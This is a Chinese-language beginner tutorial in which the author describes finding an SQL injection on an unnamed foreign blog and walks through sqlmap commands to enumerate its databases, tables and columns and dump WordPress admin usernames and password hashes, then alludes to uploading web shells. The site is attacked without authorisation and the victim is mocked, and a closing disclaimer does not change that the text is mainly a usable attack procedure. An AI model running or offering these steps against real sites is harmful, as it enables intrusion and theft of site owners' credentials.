详解新手如何使用sqlmap对mysql数据库进行注入攻击

步骤1：发现注入
闲来没事儿在网上瞎逛，无意中点开一个国外的博客，发现链接是以id为结尾的，于是就手工检测了一下，结果嘛…你懂的
检测页面返回不正常，明显是带入数据库查询了，并且没有WAF，老弟就只好给你上一课啦嘻嘻嘻
这里需要注意一下：
mysql跟Access有些不同，mysql数据库里有很多个数据库，我们需要知道网站自己的数据库，以便于得到管理的账号密码，它的结构大体是这样的：
步骤二：使用sqlmap进行注入攻击
首先我们先看一下他的权限，如果是DBA的话可以直接写一句话的，前提是你也要有网站的绝对路径，接下来用
sqlmap -u “www.XXXX.com/web/index.php?id=31” --is-dbaFalse，很遗憾并不是，你就只能一步一步来了
接着用sqlmap -u “www.XXX.com/web/index.php?id=31” --current-db，爆一下它自己的数据库，一般网站管理的账号密码都在这里面
然后用sqlmap -u “www.XXX.com/web/index.php?id=31” --tables -D 数据库名 来爆表名
从这里可以看出，后台用的是WordPress，假设我们一开始没有发现注入，我们同样可以用0day来搞它，网站后台的账号密码不出意外应该在uesrs表中，我们用
sqlmap -u “www.XXX.com/web/index.php?id=31” --columns -T wp_users -D sallatykkaco 来爆列名
很明显账号密码在user_login，user_pass这两个列里，然后我们用
sqlmap -u “www.XXX.com/web/index.php?id=31” --dump -C “user_login,user_pass” -T wp_users -D sallatykkaco 来爆字段名
这里提示需要**，由于很慢(slow)我们就不在这上面**了，拿到网站上去解码
这个加密形式老弟还是头一回见，这下得好好研究一下了…
剩下的常规操作就不在这里一一细说了，进后台，传小马，放大马，拿Shell…
注：本文仅供参考学习，请勿在网上搞破坏，触犯法律者应承担相应的法律责任！